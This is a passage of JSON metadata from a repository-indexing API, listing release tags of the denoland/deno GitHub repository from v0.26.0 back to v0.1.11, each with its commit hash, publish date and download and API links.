s.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da9